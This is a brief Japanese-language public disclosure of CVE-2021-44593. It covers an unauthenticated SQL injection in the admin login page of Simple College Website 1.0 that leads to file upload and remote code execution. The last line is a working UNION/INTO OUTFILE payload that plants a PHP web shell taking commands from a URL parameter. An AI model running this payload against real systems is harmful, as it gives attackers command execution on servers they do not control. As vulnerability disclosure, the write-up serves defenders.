
CVE-2021-44593の公開開示とライトアップ。Simple College Websiteにおける認証不要のSQLインジェクションにより、任意のファイルアップロードとリモートコード実行が可能になります。
CVE-2021-44593 の公開情報。Simple College Website における SQL インジェクション/任意ファイルアップロード/リモートコード実行の脆弱性。
Simple College Website 1.0 は、/admin/login.php ページの "username" パラメータにおいて、認証を必要としない UNION ベースの SQL インジェクションに対して脆弱です。これを悪用して任意のファイルをアップロードし、リモートコード実行を獲得することができます。
admin_class.php 内の関数 login()
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -